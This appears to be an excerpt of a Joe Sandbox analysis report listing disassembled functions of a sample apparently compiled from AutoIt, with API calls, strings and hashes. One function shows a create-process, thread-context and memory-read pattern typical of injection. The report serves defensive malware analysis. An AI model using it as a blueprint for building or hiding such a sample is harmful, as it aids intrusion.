Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: c82a6b1542423c0647a6e67107236081701a3d29b02f1008098bd548c2d52a1c
Instruction ID: 5706846e5cea2369c54bea3b529633b7e152927fcf4d14b9aec6918853d91cbf
Opcode Fuzzy Hash: c82a6b1542423c0647a6e67107236081701a3d29b02f1008098bd548c2d52a1c
Instruction Fuzzy Hash: CD916071930229AFCF04EFA4DC919EEB7B4BF19310F50442AF816AB291DB749A65CF50

Function 002240E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00293725
GetOpenFileNameW.COMDLG32 ref: 0029376F

Part of subcall function 0022660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002253B1,?,?,002261FF,?,00000000,00000001,00000000), ref: 0022662F

Part of subcall function 002240A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002240C6

Strings

t3-, xrefs: 00293745
X, xrefs: 0029373E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X$t3-
API String ID: 3777226403-56472247
Opcode ID: a30994aead416e3fa5cc9531c24eef0ef22e298de8cc8c87a96d85e0258d41ef
Instruction ID: bdd627238e2fab642ac12debd0cd98f257303d77a07b9736a16b343eb110b108
Opcode Fuzzy Hash: a30994aead416e3fa5cc9531c24eef0ef22e298de8cc8c87a96d85e0258d41ef
Instruction Fuzzy Hash: 7121BB71A20198AFCF41EFD4D8457EEBBF89F49304F00405AE505BB241DBF45AA98F65

Function 002434AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 002434FE

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00243539
__wopenfile.LIBCMT ref: 00243549

Strings

<G, xrefs: 002434CD, 002434F0, 002434FC

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 5875d682f3e5f7eb02118dad21f08514eabe708b205b64d827488783795f3985
Instruction ID: 83812bff3f0518f192b8416145a7dd8ae32d95380861604dc42276524b6cad17
Opcode Fuzzy Hash: 5875d682f3e5f7eb02118dad21f08514eabe708b205b64d827488783795f3985
Instruction Fuzzy Hash: 9F110A70A30206DBDB1AFFB48C426AE36A4AF05350B158426E415D7281EB70CE319FB1

Function 0023D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0023D28B,SwapMouseButtons,00000004,?), ref: 0023D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0023D28B,SwapMouseButtons,00000004,?,?,?,?,0023C865), ref: 0023D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0023D28B,SwapMouseButtons,00000004,?,?,?,?,0023C865), ref: 0023D2FF

Strings

Control Panel\Mouse, xrefs: 0023D2BA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 6d1e264ddb2e436e7fb57c39d2109848f10840c19cb4f082f97b672154ce0b67
Instruction ID: bfa762ae5954b4c3e643bfeeec87fca4c3e0db49d15946cda0617839c1a643e2
Opcode Fuzzy Hash: 6d1e264ddb2e436e7fb57c39d2109848f10840c19cb4f082f97b672154ce0b67
Instruction Fuzzy Hash: 6B117CB5621209BFDB108F64EC84EAF7BBCEF05740F004469F902D7210E7719E519B60

Function 01875E40 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 018765FB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01876691
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018766B3

Memory Dump Source

Source File: 00000000.00000002.2157695830.0000000001874000.00000040.00000020.00020000.00000000.sdmp, Offset: 01874000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1874000_WDpjhC3jpq.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
Instruction ID: c14caebcf61b819c9e3848e24faafc2762892a9433496be3f0ddb9c413680689
Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
Instruction Fuzzy Hash: DA621C30A14658DBEB24CFA4C850BDEB772EF58304F1091A9D20DEB394E7769E81CB59

Function 0026C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00224517: _fseek.LIBCMT ref: 0022452F

Part of subcall function 0026C56D: _wcscmp.LIBCMT ref: 0026C65D
Part of subcall function 0026C56D: _wcscmp.LIBCMT ref: 0026C670

_free.LIBCMT ref: 0026C4DD
_free.LIBCMT ref: 0026C4E4
_free.LIBCMT ref: 0026C54F

Part of subcall function 00241C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00247A85), ref: 00241CB1
Part of subcall function 00241C9D: GetLastError.KERNEL32(00000000,?,00247A85), ref: 00241CC3

_free.LIBCMT ref: 0026C557

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction ID: 93eac5a230e1a66a57be6faf42c66f945d8a9f9fe414458c2a470049c2644e57
Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction Fuzzy Hash: CA5140B1914219AFDF15AF64DC81BAEBBB9EF48300F10009EF259E3251DB715AA0CF59

Function 0023EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0023EBB2

Part of subcall function 002251AF: _memset.LIBCMT ref: 0022522F
Part of subcall function 002251AF: _wcscpy.LIBCMT ref: 00225283
Part of subcall function 002251AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00225293

KillTimer.USER32(?,00000001,?,?), ref: 0023EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0023EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00293C88

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: c43fed92cbc121fa8d7cdf2e0841d032df5b5ba6828b2a4c0857f2096045e49f
Instruction ID: b051e3c1f2a1c1c94b601fe534d4cd1360ce2e5cca2bb8e55b8d157a2684dad3
Opcode Fuzzy Hash: c43fed92cbc121fa8d7cdf2e0841d032df5b5ba6828b2a4c0857f2096045e49f
Instruction Fuzzy Hash: E121FCB0514794AFEF32DB24DC59BEBBBEC9B05308F04045EE69F56181C7B42A98CB51

Function 0026C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0026C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0026C746

Strings

aut, xrefs: 0026C740

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 3577db9f09f748078b9d47885077c2df8a335c171dc30e6bbab8e46c1dc6671c
Instruction ID: 53cf79cc9fcfdb00f3a7068cdd88ca6a30068545a2c4096cd674e75a6f01b003
Opcode Fuzzy Hash: 3577db9f09f748078b9d47885077c2df8a335c171dc30e6bbab8e46c1dc6671c
Instruction Fuzzy Hash: 3AD05E7550030EABDB10AB90EC0EFCA776C9701704F0001A17A51A50B2DAB0E699CB55

Function 0027F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61f6ece3063456e2f3a7ea798007db2e4d452eb7b1a5fd6f7389270cfb76570
Instruction ID: d3899cdaae6f5553fc52c5ffd37a3ed89627a1d6d9e797846afcd126604730af
Opcode Fuzzy Hash: c61f6ece3063456e2f3a7ea798007db2e4d452eb7b1a5fd6f7389270cfb76570
Instruction Fuzzy Hash: 1AF168716183019FCB50DF24C981B6AB7E5FF88314F10892EF9999B292DB70E955CF82

Function 00224FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00225022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 002250CB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 42fe65f8d65f7f681b3730744a68ab3bd2f09355a817a62adec50ccc79d00812
Instruction ID: 42cbd0f19baf05a716e716b92dd68ff20c6a0cd938efea1c085658b1bc0ee909
Opcode Fuzzy Hash: 42fe65f8d65f7f681b3730744a68ab3bd2f09355a817a62adec50ccc79d00812
Instruction Fuzzy Hash: CE31C3B0514721DFC720DF64E88469BBBE4FF48304F00092EF69E87250E7716A64CBA2

Function 0024395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00243973

Part of subcall function 002481C2: __NMSG_WRITE.LIBCMT ref: 002481E9
Part of subcall function 002481C2: __NMSG_WRITE.LIBCMT ref: 002481F3

__NMSG_WRITE.LIBCMT ref: 0024397A

Part of subcall function 0024821F: GetModuleFileNameW.KERNEL32(00000000,002E0312,00000104,00000000,00000001,00000000), ref: 002482B1
Part of subcall function 0024821F: ___crtMessageBoxW.LIBCMT ref: 0024835F

Part of subcall function 00241145: ___crtCorExitProcess.LIBCMT ref: 0024114B
Part of subcall function 00241145: ExitProcess.KERNEL32 ref: 00241154

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

RtlAllocateHeap.NTDLL(01830000,00000000,00000001,00000001,00000000,?,?,0023F507,?,0000000E), ref: 0024399F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 227e4eeb044c8e1fe946ae03a96d77a6db2061490e3fcbbb93ed8e6970ab5ea2
Instruction ID: 450c197e3c04ef1fbc16899de93de09334b6fb769776ec28b801c8b3e213d115
Opcode Fuzzy Hash: 227e4eeb044c8e1fe946ae03a96d77a6db2061490e3fcbbb93ed8e6970ab5ea2
Instruction Fuzzy Hash: 7001B9353B52429AE62DBF74EC86B2E33489F81B60F210026F5199B2C2DFF49D604E60

Function 0026C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0026C385,?,?,?,?,?,00000004), ref: 0026C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0026C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0026C708
CloseHandle.KERNEL32(00000000,?,0026C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0026C70F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: ae5f24e41d582e2238b83a9dfc55eedcc0bec1369931c181ed9f96a551c7b645
Instruction ID: ecb515365a8d28d002f96925352ac7797988e27cbbacb85171f889c2376852eb
Opcode Fuzzy Hash: ae5f24e41d582e2238b83a9dfc55eedcc0bec1369931c181ed9f96a551c7b645
Instruction Fuzzy Hash: 09E08632240214B7DB212F54BC0DFDA7B18EB06760F104110FB55694E09BB125619B98

Function 0026BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0026BB72

Part of subcall function 00241C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00247A85), ref: 00241CB1
Part of subcall function 00241C9D: GetLastError.KERNEL32(00000000,?,00247A85), ref: 00241CC3

_free.LIBCMT ref: 0026BB83
_free.LIBCMT ref: 0026BB95

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction ID: 174942e7fc9ca153c72ad3629427fec32194981b8d9e512990c6c58f794000bd
Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction Fuzzy Hash: C9E012A167174246DA286979AE84FB323CC4F04355714081EB859E714ACF24E8F089A4

Function 00222322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 002222A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002224F1), ref: 00222303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002225A1
CoInitialize.OLE32(00000000), ref: 00222618
CloseHandle.KERNEL32(00000000), ref: 0029503A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: b9b9e68941ba8bf64efaa65527789b5e0ca5be7e4bc3f5d3b13508b9d4dc6eca
Instruction ID: 4668dcde7d5025e03d8354842b654caed044edb7aa96828114cb80656c188a3a
Opcode Fuzzy Hash: b9b9e68941ba8bf64efaa65527789b5e0ca5be7e4bc3f5d3b13508b9d4dc6eca
Instruction Fuzzy Hash: F0718CB49A12E19AC704EF6ABDD8499BBA4BB99340780417EDA09CF7B1CB304874CF55

Function 00223A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00223A73

Part of subcall function 00241405: __lock.LIBCMT ref: 0024140B

Part of subcall function 00223ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00223AF3
Part of subcall function 00223ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00223B08

Part of subcall function 00223D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00223AA3,?), ref: 00223D45
Part of subcall function 00223D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00223AA3,?), ref: 00223D57
Part of subcall function 00223D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,002E1148,002E1130,?,?,?,?,00223AA3,?), ref: 00223DC8
Part of subcall function 00223D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00223AA3,?), ref: 00223E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00223AB3

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: 9134df3d0d5511d46c94e34c6261ac51ba45ec2912011ecef2b33cb041764a04
Instruction ID: d8f68e407fcb1be2fa9ab232feca44afcd82bb5e23b295ad3ad725389fd18810
Opcode Fuzzy Hash: 9134df3d0d5511d46c94e34c6261ac51ba45ec2912011ecef2b33cb041764a04
Instruction Fuzzy Hash: B6119371924381DBC704DF55FC4990AFBE8EB95710F00491FF8858B2A1DB709664CF92

Function 0024E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0024EA29
__close_nolock.LIBCMT ref: 0024EA42

Part of subcall function 00247BDA: __getptd_noexit.LIBCMT ref: 00247BDA

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: e53a0fd89c4d7e82277b7253d2f72c552ebd698337d9d211c5023e26145038d3
Instruction ID: a3d01906cd2a4f0098aa0f6b6b7fe09904720ec620e3f7f81e99c4451ec8f2dd
Opcode Fuzzy Hash: e53a0fd89c4d7e82277b7253d2f72c552ebd698337d9d211c5023e26145038d3
Instruction Fuzzy Hash: C211E972475A618AEB1EBFA4D8863583A517F82331F174740E4305F1E3C7B48C608FA1

Function 0023F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0024395C: __FF_MSGBANNER.LIBCMT ref: 00243973
Part of subcall function 0024395C: __NMSG_WRITE.LIBCMT ref: 0024397A
Part of subcall function 0024395C: RtlAllocateHeap.NTDLL(01830000,00000000,00000001,00000001,00000000,?,?,0023F507,?,0000000E), ref: 0024399F

std::exception::exception.LIBCMT ref: 0023F51E
__CxxThrowException@8.LIBCMT ref: 0023F533

Part of subcall function 00246805: RaiseException.KERNEL32(?,?,0000000E,002D6A30,?,?,?,0023F538,0000000E,002D6A30,?,00000001), ref: 00246856

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: e4104457f5f7da2399ac6b3b0677e039bcf067d1a2f2b6be392837863e2bf484
Instruction ID: 36107f61cfb4c0470a882ab563581083c6bea32a0081b47af7f5f26421524289
Opcode Fuzzy Hash: e4104457f5f7da2399ac6b3b0677e039bcf067d1a2f2b6be392837863e2bf484
Instruction Fuzzy Hash: D6F0287152031E67C708BF98ED059DE77EC9F02314F604026FA0AD2181CFF0DA708AA5

Function 002435E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

__lock_file.LIBCMT ref: 00243629

Part of subcall function 00244E1C: __lock.LIBCMT ref: 00244E3F

__fclose_nolock.LIBCMT ref: 00243634

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
